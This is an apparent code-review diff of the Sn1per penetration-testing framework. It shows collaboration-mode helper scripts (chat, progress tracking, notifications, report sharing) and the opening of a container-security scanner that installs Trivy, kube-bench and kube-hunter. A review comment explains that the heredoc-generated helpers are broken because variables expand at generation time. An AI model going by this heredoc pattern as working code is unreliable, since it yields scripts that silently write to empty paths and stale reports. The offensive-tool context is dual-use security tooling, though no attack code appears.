"$REPORT_FILE" << REPORT_EOF +# Sn1per Team Report - $TARGET +## Generated: $(date) +## Team Members: $(whoami) + +### Executive Summary +- Target: $TARGET +- Scan Status: $(ls $WORKSPACE_DIR/scans/running_*.txt 2>/dev/null | wc -l) scans running +- Total Findings: $(find $WORKSPACE_DIR -name "*.txt" | wc -l) files generated + +### Recent Activities +$(tail -10 $WORKSPACE_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null) + +### Critical Findings +$(grep -r "CRITICAL\|HIGH" $WORKSPACE_DIR/vuln-analysis/ 2>/dev/null | head -5) + +### Recommendations +1. Review all critical findings +2. Coordinate remediation efforts +3. Schedule follow-up scans + +### Team Notes +$(cat $WORKSPACE_DIR/collaboration/team-notes.txt 2>/dev/null) + +--- +*Generated by Sn1per Collaboration System* +REPORT_EOF + + echo "[+] Team report created: $REPORT_FILE" +} + +# Main menu +while true; do + echo "" + echo "=== Workspace Sharing Menu ===" + echo "1. Share files with team" + echo "2. Sync with team" + echo "3. Create team report" + echo "4. 
Show shared files" + echo "5. Exit" + echo "" + + read -p "Choose option: " choice + + case \$choice in + 1) + share_files + ;; + 2) + sync_with_team + ;; + 3) + create_team_report + ;; + 4) + echo "=== Shared Files ===" + ls -la "$WORKSPACE_DIR/shared/" 2>/dev/null + echo "===================" + ;; + 5) + echo "[*] Exiting workspace sharing..." + break + ;; + *) + echo "[-] Invalid option" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/shared-workspace/workspace-share.sh + +# 3. PROGRESS TRACKING SYSTEM +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED PROGRESS TRACKING SYSTEM $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up progress tracking..." + +# Create progress tracking script +cat > $LOOT_DIR/collaboration/progress-tracking/progress-tracker.sh << EOF +#!/bin/bash +# Sn1per Progress Tracking System + +TARGET="$TARGET" +PROGRESS_FILE="$LOOT_DIR/collaboration/progress-tracking/scan-progress.json" + +# Initialize progress file +if [[ ! 
-f "$PROGRESS_FILE" ]]; then + cat > "$PROGRESS_FILE" << JSON_EOF +{ + "target": "$TARGET", + "start_time": "$(date -Iseconds)", + "status": "in_progress", + "modules": { + "recon": {"status": "pending", "progress": 0, "eta": "unknown"}, + "vuln_analysis": {"status": "pending", "progress": 0, "eta": "unknown"}, + "ml_analysis": {"status": "pending", "progress": 0, "eta": "unknown"}, + "exploit_framework": {"status": "pending", "progress": 0, "eta": "unknown"}, + "evasion_techniques": {"status": "pending", "progress": 0, "eta": "unknown"} + }, + "overall_progress": 0, + "estimated_completion": "unknown", + "team_members": ["$(whoami)"], + "active_tasks": [] +} +JSON_EOF +fi + +# Function to update progress +update_progress() { + module=\$1 + progress=\$2 + status=\$3 + + # Update JSON file + sed -i "s/\"$module\": {\"status\": \".*\", \"progress\": [0-9]*, \"eta\": \".*\"}/\"$module\": {\"status\": \"$status\", \"progress\": $progress, \"eta\": \"calculating\"}/g" "$PROGRESS_FILE" + + # Calculate overall progress + total_modules=5 + completed_modules=\$(grep -o "\"status\": \"completed\"" "$PROGRESS_FILE" | wc -l) + overall_progress=\$((completed_modules * 100 / total_modules)) + + # Update overall progress + sed -i "s/\"overall_progress\": [0-9]*/\"overall_progress\": $overall_progress/g" "$PROGRESS_FILE" + + echo "[+] Progress updated: $module - $progress% ($status)" +} + +# Function to show progress +show_progress() { + echo "=== Scan Progress for $TARGET ===" + + if [[ -f "$PROGRESS_FILE" ]]; then + echo "Overall Progress: \$(grep -o '"overall_progress": [0-9]*' "$PROGRESS_FILE" | cut -d: -f2)%" + echo "" + echo "Module Status:" + grep -A 1 -B 1 "module" "$PROGRESS_FILE" | grep -E "(module|status|progress)" | sed 's/.*"module": "\([^"]*\)".*/\1:/;s/.*"status": "\([^"]*\)".*/ Status: \1/;s/.*"progress": \([0-9]*\).*/ Progress: \1%/' + fi + + echo "" + echo "Running Tasks:" + ls $LOOT_DIR/scans/running_*.txt 2>/dev/null | wc -l + echo "tasks running" + + echo "" + 
echo "Recent Activities:" + tail -5 $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null +} + +# Function to estimate completion time +estimate_completion() { + echo "[*] Estimating completion time..." + + running_tasks=\$(ls $LOOT_DIR/scans/running_*.txt 2>/dev/null | wc -l) + + if [[ \$running_tasks -gt 0 ]]; then + # Simple estimation based on running tasks + avg_time_per_task=30 # minutes + estimated_minutes=\$((running_tasks * avg_time_per_task)) + estimated_time=\$(date -d "+\$estimated_minutes minutes" '+%Y-%m-%d %H:%M') + + sed -i "s/\"estimated_completion\": \".*\"/\"estimated_completion\": \"$estimated_time\"/g" "$PROGRESS_FILE" + echo "[+] Estimated completion: \$estimated_time" + else + echo "[-] No running tasks to estimate" + fi +} + +# Main progress tracking loop +while true; do + echo "" + echo "=== Progress Tracking Menu ===" + echo "1. Show current progress" + echo "2. Update module progress" + echo "3. Estimate completion time" + echo "4. Mark module complete" + echo "5. Refresh status" + echo "6. Exit" + echo "" + + read -p "Choose option: " choice + + case \$choice in + 1) + show_progress + ;; + 2) + echo "Available modules: recon, vuln_analysis, ml_analysis, exploit_framework, evasion_techniques" + read -p "Module name: " module + read -p "Progress (0-100): " progress + read -p "Status (pending/in_progress/completed): " status + update_progress "\$module" "\$progress" "\$status" + ;; + 3) + estimate_completion + ;; + 4) + read -p "Module to mark complete: " module + update_progress "\$module" "100" "completed" + ;; + 5) + echo "[*] Refreshing status..." + show_progress + ;; + 6) + echo "[*] Exiting progress tracker..." + break + ;; + *) + echo "[-] Invalid option" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/progress-tracking/progress-tracker.sh + +# 4. 
NOTIFICATION CENTER +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED NOTIFICATION CENTER $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up notification center..." + +# Create notification system +cat > $LOOT_DIR/collaboration/notification-center/notification-system.sh << EOF +#!/bin/bash +# Sn1per Notification Center + +TARGET="$TARGET" +NOTIFICATION_LOG="$LOOT_DIR/collaboration/notification-center/notifications.log" + +# Function to send notification +send_notification() { + priority=\$1 + message=\$2 + + echo "[\$(date '+%Y-%m-%d %H:%M:%S')] [\$priority] \$message" >> "$NOTIFICATION_LOG" + + # Send to Slack if configured + if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[\$priority] \$message" + fi + + # Display notification + case \$priority in + "CRITICAL") + echo -e "$OKRED[CRITICAL] \$message$RESET" + ;; + "HIGH") + echo -e "$OKORANGE[HIGH] \$message$RESET" + ;; + "MEDIUM") + echo -e "$OKYELLOW[MEDIUM] \$message$RESET" + ;; + "LOW") + echo -e "$OKBLUE[LOW] \$message$RESET" + ;; + "INFO") + echo -e "$OKGREEN[INFO] \$message$RESET" + ;; + esac +} + +# Function to show notifications +show_notifications() { + echo "=== Recent Notifications ===" + tail -20 "$NOTIFICATION_LOG" 2>/dev/null + echo "===========================" +} + +# Function to filter notifications +filter_notifications() { + priority=\$1 + echo "=== \$priority Priority Notifications ===" + grep "\[$priority\]" "$NOTIFICATION_LOG" 2>/dev/null | tail -10 + echo "====================================" +} + +# Function to send critical finding notification +notify_critical_finding() { + finding=\$1 + send_notification "CRITICAL" "Critical finding detected: \$finding" +} + +# 
Function to send progress update +notify_progress_update() { + module=\$1 + progress=\$2 + send_notification "INFO" "Progress update: \$module - \$progress% complete" +} + +# Function to send scan completion +notify_scan_complete() { + scan_type=\$1 + send_notification "HIGH" "Scan completed: \$scan_type for $TARGET" +} + +# Main notification menu +while true; do + echo "" + echo "=== Notification Center ===" + echo "1. Show all notifications" + echo "2. Show critical notifications" + echo "3. Show high priority notifications" + echo "4. Show medium priority notifications" + echo "5. Send test notification" + echo "6. Clear notifications" + echo "7. Exit" + echo "" + + read -p "Choose option: " choice + + case \$choice in + 1) + show_notifications + ;; + 2) + filter_notifications "CRITICAL" + ;; + 3) + filter_notifications "HIGH" + ;; + 4) + filter_notifications "MEDIUM" + ;; + 5) + read -p "Priority (CRITICAL/HIGH/MEDIUM/LOW/INFO): " priority + read -p "Message: " message + send_notification "\$priority" "\$message" + ;; + 6) + echo "[*] Clearing notifications..." + > "$NOTIFICATION_LOG" + ;; + 7) + echo "[*] Exiting notification center..." + break + ;; + *) + echo "[-] Invalid option" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/notification-center/notification-system.sh + +# 5. REPORT SHARING SYSTEM +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED REPORT SHARING SYSTEM $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +echo -e "$OKBLUE[*]$RESET Setting up report sharing..." 
+ +# Create report sharing script +cat > $LOOT_DIR/collaboration/report-sharing/report-share.sh << EOF +#!/bin/bash +# Sn1per Report Sharing System + +TARGET="$TARGET" +SHARED_DIR="$LOOT_DIR/shared" + +# Function to generate comprehensive report +generate_comprehensive_report() { + echo "[*] Generating comprehensive team report..." + + REPORT_FILE="$SHARED_DIR/comprehensive-report-$TARGET.html" + + cat > "$REPORT_FILE" << HTML_EOF + + + + Sn1per Team Report - $TARGET + + + +
+

Sn1per Team Report - $TARGET

+

Generated: $(date)

+

Team Members: $(whoami)

+
+ +
+

Executive Summary

+

Target: $TARGET

+

Scan Status: $(ls $LOOT_DIR/scans/running_*.txt 2>/dev/null | wc -l) scans running

+

Total Findings: $(find $LOOT_DIR -name "*.txt" | wc -l) files generated

+
+ +
+

Critical Findings

+ $(grep -r "CRITICAL\|HIGH" $LOOT_DIR/vuln-analysis/ 2>/dev/null | head -10 | sed 's/.*/

&<\/p>/') +

+ +
+

AI Analysis Results

+ $(grep -A 5 "Threat Score:" $LOOT_DIR/ml-analysis/ai-analysis-report-$TARGET.txt 2>/dev/null | head -10 | sed 's/.*/

&<\/p>/') +

+ +
+

Collaboration Notes

+ $(tail -10 $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null | sed 's/.*/

&<\/p>/') +

+ +
+

Recommendations

+
    +
  1. Review all critical findings immediately
  2. +
  3. Coordinate remediation efforts with team
  4. +
  5. Schedule follow-up scans as needed
  6. +
  7. Document all findings for compliance
  8. +
+
+ + +HTML_EOF + + echo "[+] Comprehensive report generated: $REPORT_FILE" +} + +# Function to share report via various methods +share_report() { + echo "[*] Sharing report..." + + # Generate report first + generate_comprehensive_report + + echo "Share options:" + echo "1. Copy to shared directory" + echo "2. Export to PDF (if wkhtmltopdf available)" + echo "3. Send via email (if configured)" + echo "4. Upload to collaboration platform" + + read -p "Choose sharing method: " method + + case \$method in + 1) + echo "[+] Report available in: $SHARED_DIR" + ;; + 2) + if command -v wkhtmltopdf &> /dev/null; then + wkhtmltopdf "$SHARED_DIR/comprehensive-report-$TARGET.html" "$SHARED_DIR/comprehensive-report-$TARGET.pdf" + echo "[+] PDF report generated: $SHARED_DIR/comprehensive-report-$TARGET.pdf" + else + echo "[-] wkhtmltopdf not available" + fi + ;; + 3) + echo "[*] Email sharing not configured in this demo" + ;; + 4) + echo "[*] Platform upload not configured in this demo" + ;; + *) + echo "[-] Invalid option" + ;; + esac +} + +# Function to create summary report +create_summary() { + echo "[*] Creating summary report..." + + SUMMARY_FILE="$SHARED_DIR/summary-$TARGET.txt" + + cat > "$SUMMARY_FILE" << SUMMARY_EOF +SN1PER TEAM SUMMARY REPORT - $TARGET +===================================== +Generated: $(date) +Team: $(whoami) + +KEY FINDINGS: +$(grep -r "CRITICAL\|HIGH" $LOOT_DIR/ 2>/dev/null | head -5) + +AI THREAT SCORE: +$(grep "Threat Score:" $LOOT_DIR/ml-analysis/ai-analysis-report-$TARGET.txt 2>/dev/null) + +ACTIVE COLLABORATION: +$(tail -3 $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null) + +NEXT STEPS: +1. Review critical findings +2. Coordinate remediation +3. 
Plan follow-up actions + +SHARED FILES: +$(ls $SHARED_DIR/ | tr '\n' ' ') + +--- +Quick access to reports: +- Full report: $SHARED_DIR/comprehensive-report-$TARGET.html +- Vulnerability report: $SHARED_DIR/vulnerability-report-$TARGET.txt +- AI analysis: $SHARED_DIR/ai-analysis-report-$TARGET.txt +SUMMARY_EOF + + echo "[+] Summary created: $SUMMARY_FILE" +} + +# Main report sharing menu +while true; do + echo "" + echo "=== Report Sharing Center ===" + echo "1. Generate comprehensive report" + echo "2. Share report" + echo "3. Create summary report" + echo "4. Show shared files" + echo "5. Exit" + echo "" + + read -p "Choose option: " choice + + case \$choice in + 1) + generate_comprehensive_report + ;; + 2) + share_report + ;; + 3) + create_summary + ;; + 4) + echo "=== Shared Files ===" + ls -la "$SHARED_DIR/" 2>/dev/null + echo "===================" + ;; + 5) + echo "[*] Exiting report sharing..." + break + ;; + *) + echo "[-] Invalid option" + ;; + esac +done +EOF +chmod +x $LOOT_DIR/collaboration/report-sharing/report-share.sh + +# 6. 
GENERATE COLLABORATION REPORT +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED GENERATING COLLABORATION REPORT $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Compile comprehensive collaboration report +cat > $LOOT_DIR/collaboration/collaboration-report-$TARGET.txt << EOF +SNIPER SECURITY - REAL-TIME COLLABORATION REPORT +================================================= +Target: $TARGET +Scan Date: $(date) +Framework: Sn1per v$VER - Real-Time Collaboration Mode + +EXECUTIVE SUMMARY +================= +Collaboration System Status: ACTIVE +Team Chat System: $(if [[ -f "$LOOT_DIR/collaboration/team-chat/chat-server.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) +Shared Workspace: $(if [[ -f "$LOOT_DIR/collaboration/shared-workspace/workspace-share.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) +Progress Tracking: $(if [[ -f "$LOOT_DIR/collaboration/progress-tracking/progress-tracker.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) +Notification Center: $(if [[ -f "$LOOT_DIR/collaboration/notification-center/notification-system.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) +Report Sharing: $(if [[ -f "$LOOT_DIR/collaboration/report-sharing/report-share.sh" ]]; then echo "ENABLED"; else echo "DISABLED"; fi) + +TEAM CHAT SYSTEM +================ +Chat History File: $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log +Active Users: $(wc -l $LOOT_DIR/collaboration/team-chat/active-users.txt 2>/dev/null || echo "0") +Chat Messages: $(wc -l $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null || echo "0") + +SHARED WORKSPACE +================ +Shared Directory: $LOOT_DIR/shared/ +Shared Files: $(ls $LOOT_DIR/shared/ 2>/dev/null | wc -l) +Key Shared Reports: +$(ls 
$LOOT_DIR/shared/ | head -10 | sed 's/^/- /') + +PROGRESS TRACKING +================= +Progress File: $LOOT_DIR/collaboration/progress-tracking/scan-progress.json +Current Progress: $(grep "overall_progress" $LOOT_DIR/collaboration/progress-tracking/scan-progress.json 2>/dev/null | cut -d: -f2 | tr -d '"}') +Estimated Completion: $(grep "estimated_completion" $LOOT_DIR/collaboration/progress-tracking/scan-progress.json 2>/dev/null | cut -d'"' -f4) + +NOTIFICATION CENTER +================== +Notification Log: $LOOT_DIR/collaboration/notification-center/notifications.log +Total Notifications: $(wc -l $LOOT_DIR/collaboration/notification-center/notifications.log 2>/dev/null || echo "0") +Recent Notifications: +$(tail -5 $LOOT_DIR/collaboration/notification-center/notifications.log 2>/dev/null) + +REPORT SHARING +============== +Comprehensive Report: $LOOT_DIR/shared/comprehensive-report-$TARGET.html +Summary Report: $LOOT_DIR/shared/summary-$TARGET.txt +Available Reports: $(ls $LOOT_DIR/shared/ | wc -l) files + +COLLABORATION FEATURES +====================== +1. Real-time team chat with command interface +2. Shared workspace for file collaboration +3. Progress tracking with JSON-based status +4. Notification center with priority levels +5. Report sharing with HTML/PDF export +6. Slack integration for notifications +7. Team member activity tracking +8. Comprehensive collaboration logging + +USAGE INSTRUCTIONS +================== +1. Team Chat: Run $LOOT_DIR/collaboration/team-chat/chat-server.sh +2. Workspace Sharing: Run $LOOT_DIR/collaboration/shared-workspace/workspace-share.sh +3. Progress Tracking: Run $LOOT_DIR/collaboration/progress-tracking/progress-tracker.sh +4. Notifications: Run $LOOT_DIR/collaboration/notification-center/notification-system.sh +5. Report Sharing: Run $LOOT_DIR/collaboration/report-sharing/report-share.sh + +RECOMMENDATIONS +============== +1. Use team chat for real-time coordination +2. Share important findings via shared workspace +3. 
Track progress using the progress tracker +4. Set up notifications for critical findings +5. Generate and share reports regularly +6. Use Slack integration for remote teams +7. Document all team activities and decisions + +COLLABORATION METRICS +===================== +- Active Collaboration Tools: $(ls $LOOT_DIR/collaboration/ | wc -l) systems +- Team Communication: $(wc -l $LOOT_DIR/collaboration/team-chat/chat-history-$TARGET.log 2>/dev/null || echo "0") messages +- Shared Resources: $(ls $LOOT_DIR/shared/ 2>/dev/null | wc -l) files +- Progress Updates: $(grep -c "Progress update" $LOOT_DIR/collaboration/notification-center/notifications.log 2>/dev/null || echo "0") updates + +Generated by Sn1per Collaboration Framework +https://sn1persecurity.com +EOF + +echo -e "$OKGREEN[*]$RESET Real-time collaboration features completed for $TARGET" +echo -e "$OKGREEN[*]$RESET Collaboration systems activated: $(ls $LOOT_DIR/collaboration/ | wc -l) systems" +echo -e "$OKGREEN[*]$RESET Report saved to: $LOOT_DIR/collaboration/collaboration-report-$TARGET.txt" + +echo "[sn1persecurity.com] •?((¯°·._.• Completed Sn1per collaboration mode: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Completed Sn1per collaboration mode: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi diff --git a/modes/container-security.sh b/modes/container-security.sh new file mode 100644 index 00000000..5dc2f9be --- /dev/null +++ b/modes/container-security.sh 
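Review bot: The generated helper scripts reference the variables they themselves define (`CHAT_LOG`, `CHAT_USERS`, `WORKSPACE_DIR`, `SHARED_DIR`, `REPORT_FILE`, `PROGRESS_FILE`, `NOTIFICATION_LOG`, and `module`/`progress`/`status`/`overall_progress`/`estimated_time` inside `update_progress` and `estimate_completion`) without the `\$` escape that `\$message` and `\$choice` use, and because every `cat > … << EOF` delimiter is unquoted, those references are expanded while collaboration.sh runs rather than when the helper runs. Unless the parent environment happens to set them, they expand to empty strings, so the chat server writes to `> ""`, the sed patterns in `update_progress` reduce to `"": {"status": …` and never match, and `share_files` would run `mkdir -p ""` followed by `cp … "/"`. The same applies to the `$(date)`, `$(whoami)`, `$(ls …)` and `$(grep …)` substitutions inside the nested `REPORT_EOF`, `HTML_EOF` and `SUMMARY_EOF` heredocs, which are evaluated once at generation time, so every report those helpers "generate" carries the timestamp and findings from when the mode ran. Quote the outer delimiters (`<< 'EOF'`) and prepend a short header that bakes in only the generation-time values (`TARGET`, `LOOT_DIR`, `INSTALL_DIR`, `SLACK_NOTIFICATIONS`, the colour variables), or escape every runtime reference as `\$VAR` / `\$(cmd)`.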
@@ -0,0 +1,1343 @@ +#!/bin/bash +# Container Security Scan Mode +# Author: Sn1per Security Team +# Description: Comprehensive container security scanning for Docker and Kubernetes +# Version: 1.0 + +# Set colors for output +RED="\033[01;31m" +GREEN="\033[01;32m" +YELLOW="\033[01;33m" +BLUE="\033[01;34m" +BOLD="\033[1m" +RESET="\033[00m" + +# Global variables +TARGET="" +OUTPUT_DIR="" +SCAN_TYPE="all" # all, docker, kubernetes, image +SCAN_DEPTH="standard" # quick, standard, deep +REPORT_FORMAT="html" # html, json, pdf +VERBOSE=false +DOCKER_IMAGES=() +KUBERNETES_CONTEXTS=() +SCAN_TIMESTAMP=$(date +"%Y%m%d_%H%M%S") +REPORT_FILE="" + +# Check if running as root +check_root() { + if [ "$(id -u)" -ne 0 ]; then + echo -e "${RED}[!]${RESET} This script must be run as root" + exit 1 + fi +} + +# Show banner +show_banner() { + echo -e "${BLUE}" + echo " ██████╗ ██████╗ ███╗ ██╗████████╗ █████╗ ██╗███╗ ██╗███████╗██████╗ " + echo " ██╔════╝██╔═══██╗████╗ ██║╚══██╔══╝██╔══██╗██║████╗ ██║██╔════╝╚════██╗" + echo " ██║ ██║ ██║██╔██╗ ██║ ██║ ███████║██║██╔██╗ ██║█████╗ █████╔╝" + echo " ██║ ██║ ██║██║╚██╗██║ ██║ ██╔══██║██║██║╚██╗██║██╔══╝ ╚═══██╗" + echo " ╚██████╗╚██████╔╝██║ ╚████║ ██║ ██║ ██║██║██║ ╚████║███████╗██████╔╝" + echo " ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═════╝ " + echo -e "${RESET}" + echo -e "${BOLD}Container Security Scanner - Part of Sn1per Pro${RESET}" + echo -e "Version 1.0 | https://sn1persecurity.com" + echo -e "${BLUE}------------------------------------------------${RESET}" +} + +# Check for required tools +check_dependencies() { + local missing_deps=() + + # Core tools + local core_tools=("docker" "jq" "curl" "trivy" "kubectl" "kube-bench" "kube-hunter" "dockle" "clair" "anchore-cli") + + for tool in "${core_tools[@]}"; do + if ! command -v "$tool" &> /dev/null; then + missing_deps+=("$tool") + echo -e "${YELLOW}[!]${RESET} $tool is not installed" + fi + done + + # Check for Docker + if ! 
systemctl is-active --quiet docker 2>/dev/null; then + echo -e "${YELLOW}[!]${RESET} Docker service is not running" + echo -e "${BLUE}[*]${RESET} Attempting to start Docker service..." + if command -v systemctl &> /dev/null; then + systemctl start docker + elif command -v service &> /dev/null; then + service docker start + fi + + if ! systemctl is-active --quiet docker 2>/dev/null; then + echo -e "${RED}[!]${RESET} Failed to start Docker service. Please install and start Docker manually." + exit 1 + fi + fi + + # Check for Kubernetes tools if k8s scan is requested + if [[ "$SCAN_TYPE" == "kubernetes" || "$SCAN_TYPE" == "all" ]]; then + if ! command -v kubectl &> /dev/null; then + echo -e "${YELLOW}[!]${RESET} kubectl is not installed. Some Kubernetes scans will be skipped." + fi + + if ! command -v kube-bench &> /dev/null; then + echo -e "${YELLOW}[!]${RESET} kube-bench is not installed. CIS benchmark checks will be skipped." + fi + + if ! command -v kube-hunter &> /dev/null; then + echo -e "${YELLOW}[!]${RESET} kube-hunter is not installed. Kubernetes penetration testing will be skipped." + fi + fi + + # Offer to install missing dependencies + if [ ${#missing_deps[@]} -gt 0 ]; then + echo -e "\n${YELLOW}[!] Missing dependencies detected.${RESET}" + read -p "Do you want to install missing dependencies? [y/N] " -n 1 -r + echo + if [[ $REPLY =~ ^[Yy]$ ]]; then + install_dependencies "${missing_deps[@]}" + else + echo -e "${YELLOW}[!] Some features may not work without all dependencies.${RESET}" + fi + fi +} + +# Install missing dependencies +install_dependencies() { + echo -e "${BLUE}[*]${RESET} Installing missing dependencies..." + + if command -v apt-get &> /dev/null; then + # Debian/Ubuntu + apt-get update + for dep in "$@"; do + case $dep in + docker) + echo -e "${BLUE}[*]${RESET} Installing Docker..." + apt-get install -y docker.io + systemctl enable --now docker + ;; + trivy) + echo -e "${BLUE}[*]${RESET} Installing Trivy..." 
+ apt-get install -y wget apt-transport-https gnupg lsb-release + wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | apt-key add - + echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | tee -a /etc/apt/sources.list.d/trivy.list + apt-get update + apt-get install -y trivy + ;; + kubectl) + echo -e "${BLUE}[*]${RESET} Installing kubectl..." + curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" + install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl + ;; + kube-bench) + echo -e "${BLUE}[*]${RESET} Installing kube-bench..." + curl -L https://github.com/aquasecurity/kube-bench/releases/latest/download/kube-bench_0.6.9_linux_amd64.deb -o kube-bench.deb + apt-get install -y ./kube-bench.deb + rm kube-bench.deb + ;; + kube-hunter) + echo -e "${BLUE}[*]${RESET} Installing kube-hunter..." + pip3 install kube-hunter + ;; + dockle) + echo -e "${BLUE}[*]${RESET} Installing Dockle..." + VERSION=$( + curl -s https://api.github.com/repos/goodwithtech/dockle/releases/latest | \ + grep tag_name | \ + cut -d '"' -f 4 | \ + sed 's/v//g' + ) + wget -q -O dockle.deb "https://github.com/goodwithtech/dockle/releases/download/v${VERSION}/dockle_${VERSION}_Linux-64bit.deb" + dpkg -i dockle.deb + rm dockle.deb + ;; + anchore-cli) + echo -e "${BLUE}[*]${RESET} Installing anchore-cli..." + pip3 install anchorecli + ;; + *) + apt-get install -y "$dep" + ;; + esac + done + elif command -v yum &> /dev/null; then + # RHEL/CentOS + yum install -y epel-release + for dep in "$@"; do + case $dep in + docker) + echo -e "${BLUE}[*]${RESET} Installing Docker..." + yum install -y yum-utils + yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo + yum install -y docker-ce docker-ce-cli containerd.io + systemctl enable --now docker + ;; + trivy) + echo -e "${BLUE}[*]${RESET} Installing Trivy..." 
+ yum install -y wget + wget -O /etc/yum.repos.d/aquasec-trivy.repo https://aquasecurity.github.io/trivy-repo/rpm/aquasec-trivy.repo + yum -y update + yum -y install trivy + ;; + kubectl) + echo -e "${BLUE}[*]${RESET} Installing kubectl..." + cat < /etc/yum.repos.d/kubernetes.repo +[kubernetes] +name=Kubernetes +baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64 +enabled=1 +gpgcheck=1 +repo_gpgcheck=1 +gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg +EOF + yum install -y kubectl + ;; + *) + yum install -y "$dep" + ;; + esac + done + else + echo -e "${RED}[!]${RESET} Unsupported package manager. Please install the following tools manually:" + printf "- %s\n" "$@" + return 1 + fi + + echo -e "${GREEN}[+]${RESET} Dependencies installed successfully!" +} + +# Parse command line arguments +parse_arguments() { + while [[ $# -gt 0 ]]; do + case $1 in + -t|--target) + TARGET="$2" + shift 2 + ;; + -o|--output) + OUTPUT_DIR="$2" + shift 2 + ;; + --type) + SCAN_TYPE="${2,,}" + shift 2 + ;; + --depth) + SCAN_DEPTH="${2,,}" + shift 2 + ;; + --format) + REPORT_FORMAT="${2,,}" + shift 2 + ;; + -v|--verbose) + VERBOSE=true + shift + ;; + -h|--help) + show_help + exit 0 + ;; + *) + echo -e "${RED}[!]${RESET} Unknown option: $1" + show_help + exit 1 + ;; + esac + done + + # Validate scan type + if [[ "$SCAN_TYPE" != "all" && "$SCAN_TYPE" != "docker" && "$SCAN_TYPE" != "kubernetes" && "$SCAN_TYPE" != "image" ]]; then + echo -e "${RED}[!]${RESET} Invalid scan type. Must be one of: all, docker, kubernetes, image" + exit 1 + fi + + # Validate scan depth + if [[ "$SCAN_DEPTH" != "quick" && "$SCAN_DEPTH" != "standard" && "$SCAN_DEPTH" != "deep" ]]; then + echo -e "${YELLOW}[!]${RESET} Invalid scan depth. 
Defaulting to 'standard'" + SCAN_DEPTH="standard" + fi + + # Validate report format + if [[ "$REPORT_FORMAT" != "html" && "$REPORT_FORMAT" != "json" && "$REPORT_FORMAT" != "pdf" ]]; then + echo -e "${YELLOW}[!]${RESET} Invalid report format. Defaulting to 'html'" + REPORT_FORMAT="html" + fi + + # Set default output directory if not specified + if [ -z "$OUTPUT_DIR" ]; then + OUTPUT_DIR="$(pwd)/container_scan_${SCAN_TIMESTAMP}" + fi + + # Create output directory + mkdir -p "$OUTPUT_DIR" + + # Set report file path + REPORT_FILE="${OUTPUT_DIR}/container_security_report_${SCAN_TIMESTAMP}.${REPORT_FORMAT}" +} + +# Show help message +show_help() { + echo -e "${BOLD}Container Security Scanner - Usage:${RESET}" + echo " ./container-security.sh [options]" + echo + echo "Options:" + echo " -t, --target TARGET Target to scan (Docker image, Kubernetes namespace, or host)" + echo " -o, --output DIR Output directory for scan results (default: ./container_scan_TIMESTAMP)" + echo " --type TYPE Type of scan: all, docker, kubernetes, image (default: all)" + echo " --depth DEPTH Scan depth: quick, standard, deep (default: standard)" + echo " --format FORMAT Report format: html, json, pdf (default: html)" + echo " -v, --verbose Enable verbose output" + echo " -h, --help Show this help message" + echo + echo "Examples:" + echo " # Scan all container-related components on the host" + echo " ./container-security.sh --type all --depth standard" + echo + echo " # Scan a specific Docker image" + echo " ./container-security.sh --type image --target nginx:latest" + echo + echo " # Scan a Kubernetes namespace" + echo " ./container-security.sh --type kubernetes --target my-namespace" + echo + echo " # Run a deep scan with PDF report" + echo " ./container-security.sh --type all --depth deep --format pdf" +} + +# Check if a command exists +command_exists() { + command -v "$1" &> /dev/null +} + +# Log messages with different log levels +log() { + local level="$1" + local message="$2" + local 
